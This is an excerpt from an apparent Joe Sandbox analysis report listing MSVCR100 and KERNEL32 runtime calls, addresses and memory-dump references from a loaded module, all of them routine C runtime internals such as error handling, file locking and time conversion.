                                                                                                          • _fileno.MSVCR100(?,?,?), ref: 6FD8A839
                                                                                                          • _close.MSVCR100(00000000,?,?,?), ref: 6FD8A83F
                                                                                                          • _errno.MSVCR100 ref: 6FDA8B94
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDA8B9F
                                                                                                            • Part of subcall function 6FD8A595: _fileno.MSVCR100(?,?,?,?,?,?,?,6FD8A830,?), ref: 6FD8A5C4
                                                                                                            • Part of subcall function 6FD8A595: _write.MSVCR100(00000000,?,?,?,?,?,?,6FD8A830,?), ref: 6FD8A5CB
                                                                                                            • Part of subcall function 6FD8A7DE: free.MSVCR100(?,?,?,6FD8A838,?,?), ref: 6FD8A7F5
                                                                                                          • free.MSVCR100(?), ref: 6FDA8BB4
                                                                                                          Similarity
                                                                                                          • API ID: _filenofree$_close_errno_invalid_parameter_noinfo_write
                                                                                                          • String ID:
                                                                                                          • API String ID: 3709965489-0
                                                                                                          APIs
                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0,?,6FD8B911), ref: 6FD8AA51
                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0,?,6FD8B911), ref: 6FD8AA5E
                                                                                                          • _msize.MSVCR100(00000000,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD8AA7B
                                                                                                            • Part of subcall function 6FD825DA: HeapSize.KERNEL32(00000000,00000000,?,6FD8AA80,00000000,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?), ref: 6FD825F4
                                                                                                          • EncodePointer.KERNEL32(?,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD8AA97
                                                                                                          • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD8AA9F
                                                                                                          • _realloc_crt.MSVCR100(00000000,00000800,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD9283A
                                                                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD92850
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 765448609-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,6FD8238F,?,?,?,00000000,?), ref: 6FDA93B8
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,6FD8238F,?,?,?,00000000,?), ref: 6FDA93C3
                                                                                                          • _errno.MSVCR100(?,?,6FD8238F,?,?,?,00000000,?), ref: 6FDA93CD
                                                                                                          • _errno.MSVCR100 ref: 6FDA93E4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FD8238F,?,?,?,00000000,?), ref: 6FDA93EF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819658684-0
                                                                                                          APIs
                                                                                                          • _lock_file.MSVCR100(?,6FD92C08,0000000C), ref: 6FD92BCA
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                          • _fread_nolock_s.MSVCR100(?,?,?,?,?,6FD92C08,0000000C), ref: 6FD92BE2
                                                                                                            • Part of subcall function 6FD92ACE: memcpy_s.MSVCR100(?,?,?,?), ref: 6FD92B77
                                                                                                            • Part of subcall function 6FD92726: _unlock_file.MSVCR100(6FD92BF9,6FD92BF9), ref: 6FD92729
                                                                                                          • memset.MSVCR100(?,00000000,000000FF,?,?,6FD92C08,0000000C), ref: 6FDA8D02
                                                                                                          • _errno.MSVCR100(?,?,6FD92C08,0000000C), ref: 6FDA8D0A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FD92C08,0000000C), ref: 6FDA8D15
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_fread_nolock_s_invalid_parameter_noinfo_lock_lock_file_unlock_filememcpy_smemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4031208221-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDAF8D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDAF98
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDDAFB8
                                                                                                          • _localtime64_s.MSVCR100(?,?), ref: 6FDDAFCA
                                                                                                            • Part of subcall function 6FD96924: memset.MSVCR100(?,000000FF,00000024), ref: 6FD9694D
                                                                                                            • Part of subcall function 6FD96924: _get_daylight.MSVCR100(?), ref: 6FD96989
                                                                                                            • Part of subcall function 6FD96924: _get_dstbias.MSVCR100(?), ref: 6FD9699B
                                                                                                            • Part of subcall function 6FD96924: _get_timezone.MSVCR100(?), ref: 6FD969AD
                                                                                                            • Part of subcall function 6FD96924: _gmtime64_s.MSVCR100(?,?), ref: 6FD969E1
                                                                                                          • _wasctime.MSVCR100(?), ref: 6FDDAFD9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_get_daylight_get_dstbias_get_timezone_gmtime64_s_invalid_parameter_invalid_parameter_noinfo_localtime64_s_wasctimememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3858866722-0
                                                                                                          APIs
                                                                                                          • _control87.MSVCR100(00000001,?,00000000,?,6FDCCD13,00000000,00010000,00030000,?,6FDB1D4E,?,6FD8C434,?,?,6FD8B911,00000000), ref: 6FD8C3E3
                                                                                                          • _control87.MSVCR100(00000000,00000000,00000000,?,6FDCCD13,00000000,00010000,00030000,?,6FDB1D4E,?,6FD8C434,?,?,6FD8B911,00000000), ref: 6FDB24B3
                                                                                                          • _errno.MSVCR100(00000000,?,6FDCCD13,00000000,00010000,00030000,?,6FDB1D4E,?,6FD8C434,?,?,6FD8B911,00000000), ref: 6FDB24BC
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?,6FDCCD13,00000000,00010000,00030000,?,6FDB1D4E,?,6FD8C434,?,?,6FD8B911,00000000), ref: 6FDB24C6
                                                                                                          • _control87.MSVCR100(00000001,?,00000000,?,6FDCCD13,00000000,00010000,00030000,?,6FDB1D4E,?,6FD8C434,?,?,6FD8B911,00000000), ref: 6FDB24D2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _control87$_errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1498936549-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD9F65
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD9F70
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDD9F90
                                                                                                          • _localtime64_s.MSVCR100(?,?), ref: 6FDD9FA2
                                                                                                            • Part of subcall function 6FD96924: memset.MSVCR100(?,000000FF,00000024), ref: 6FD9694D
                                                                                                            • Part of subcall function 6FD96924: _get_daylight.MSVCR100(?), ref: 6FD96989
                                                                                                            • Part of subcall function 6FD96924: _get_dstbias.MSVCR100(?), ref: 6FD9699B
                                                                                                            • Part of subcall function 6FD96924: _get_timezone.MSVCR100(?), ref: 6FD969AD
                                                                                                            • Part of subcall function 6FD96924: _gmtime64_s.MSVCR100(?,?), ref: 6FD969E1
                                                                                                          • asctime.MSVCR100(?), ref: 6FDD9FB1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_get_daylight_get_dstbias_get_timezone_gmtime64_s_invalid_parameter_invalid_parameter_noinfo_localtime64_sasctimememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2107176077-0
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF9F98,0000000C), ref: 6FDF9F35
                                                                                                          • _errno.MSVCR100(6FDF9F98,0000000C), ref: 6FDF9F3C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF9F98,0000000C), ref: 6FDF9F47
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock.MSVCR100(00000003,6FDF9F98,0000000C), ref: 6FDF9F53
                                                                                                          • _putch_nolock.MSVCR100(?,6FDF9F98,0000000C), ref: 6FDF9F6C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno_invalid_parameter_invalid_parameter_noinfo_lock_putch_nolock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3663007277-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDAE92
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDAE9D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDDAEB5
                                                                                                          • _localtime32_s.MSVCR100(?,?), ref: 6FDDAEC7
                                                                                                            • Part of subcall function 6FDD960C: _errno.MSVCR100(?,?,?,?), ref: 6FDD9628
                                                                                                            • Part of subcall function 6FDD960C: _invalid_parameter_noinfo.MSVCR100(?,?,?,?), ref: 6FDD9632
                                                                                                          • _wasctime.MSVCR100(?), ref: 6FDDAED6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$_invalid_parameter_localtime32_s_wasctime
                                                                                                          • String ID:
                                                                                                          • API String ID: 1615393626-0
                                                                                                          APIs
                                                                                                          • TlsGetValue.KERNEL32(?,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD8291A
                                                                                                          • TlsGetValue.KERNEL32(?,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD8292C
                                                                                                          • DecodePointer.KERNEL32(00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD82942
                                                                                                          • _freefls.MSVCR100(00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD8294D
                                                                                                          • TlsSetValue.KERNEL32(FFFFFFFF,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD8295F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$DecodePointer_freefls
                                                                                                          • String ID:
                                                                                                          • API String ID: 3710474716-0
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FD8A6B0
                                                                                                          • __doserrno.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FDB040F
                                                                                                          • _errno.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FDB0417
                                                                                                          • _errno.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FDB042A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FDB0435
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2315031519-0
                                                                                                          APIs
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,00000000,?,00000000), ref: 6FDBD032
                                                                                                          • memset.MSVCR100(00000000,00000000,?,00000000,?,?,00000000,?,00000000), ref: 6FDBD045
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: $$,
                                                                                                          • API String ID: 2221118986-53852779
                                                                                                          APIs
                                                                                                          • RtlUnwind.KERNEL32(?,6FD8009E,80000026,00000000,?,?), ref: 6FD80099
                                                                                                          • _local_unwind2.MSVCR100(?,?,?), ref: 6FD800CD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unwind_local_unwind2
                                                                                                          • String ID: &$02CV
                                                                                                          • API String ID: 2435528123-3673091860
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD606F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD607A
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID: B
                                                                                                          • API String ID: 340685940-1255198513
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDBB327: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6FDBB349
                                                                                                          • ??0SchedulerPolicy@Concurrency@@QAA@IZZ.MSVCR100(?,00000000,6FE255E0,0000000C,6FDC0342,?,?,?,6FDB616E,?,6FDC5442,00000004,6FDC5D63,?,?,00000000), ref: 6FDC03DD
                                                                                                          • memcpy.MSVCR100(?,?,00000024,6FE255E0,0000000C,6FDC0342,?,?,?,6FDB616E,?,6FDC5442,00000004,6FDC5D63,?,?), ref: 6FDC03F8
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(?,?,6FDC5442,00000004,6FDC5D63,?,?,00000000,?,?,?,6FDC5C6B,00000001), ref: 6FDC0422
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency@@Spin$??3@Once@?$_Policy@SchedulerWait@$00@details@memcpy
                                                                                                          • String ID: Uo
                                                                                                          • API String ID: 888183730-1932579714
                                                                                                          APIs
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(E06D7363,1FFFFFFF,19930522), ref: 6FDF3F72
                                                                                                            • Part of subcall function 6FDF3874: DecodePointer.KERNEL32(6FDF38B0,00000008,6FDF43D7,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003), ref: 6FDF3886
                                                                                                            • Part of subcall function 6FDF3874: ?terminate@@YAXXZ.MSVCR100(?,00000000,00000003,?), ref: 6FDF38A6
                                                                                                          • ?terminate@@YAXXZ.MSVCR100(E06D7363,1FFFFFFF,19930522), ref: 6FDF3F79
                                                                                                            • Part of subcall function 6FDF380A: _getptd.MSVCR100(6FDF3848,00000008,6FDF38AB,?,00000000,00000003,?), ref: 6FDF3816
                                                                                                            • Part of subcall function 6FDF380A: abort.MSVCR100(6FDF3848,00000008,6FDF38AB,?,00000000,00000003,?), ref: 6FDF3838
                                                                                                          • __TypeMatch.MSVCR100(1FFFFFFF,00000000,?,6FDB2708,00000000,E06D7363,1FFFFFFF,19930522), ref: 6FDF3FAD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ?terminate@@$?_inconsistency@@DecodeMatchPointerType_getptdabort
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 1153117323-1018135373
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfowcslen
                                                                                                          • String ID: I
                                                                                                          • API String ID: 2689964535-3707901625
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfostrlen
                                                                                                          • String ID: I
                                                                                                          • API String ID: 1371076374-3707901625
                                                                                                          APIs
                                                                                                          • _malloc_crt.MSVCR100(00000018,00000014,6FD8C631,00000000,00000000,?), ref: 6FD8C5BD
                                                                                                            • Part of subcall function 6FD80B31: malloc.MSVCR100(00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD80B3D
                                                                                                          • ??0exception@std@@QAE@ABQBDH@Z.MSVCR100(?,00000001,00000014,6FD8C631,00000000,00000000), ref: 6FDA72C0
                                                                                                          • _CxxThrowException.MSVCR100(6FD8C631,6FD8C888,?,00000001,00000014), ref: 6FDA72D5
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@ExceptionThrow_malloc_crtmalloc
                                                                                                          • String ID: bad allocation
                                                                                                          • API String ID: 1762725783-2104205924
                                                                                                          APIs
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6FDF4035
